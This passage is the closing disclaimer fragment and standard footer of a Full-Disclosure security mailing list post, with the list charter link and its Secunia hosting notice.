this information. Any use of this information is at the user's own risk.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
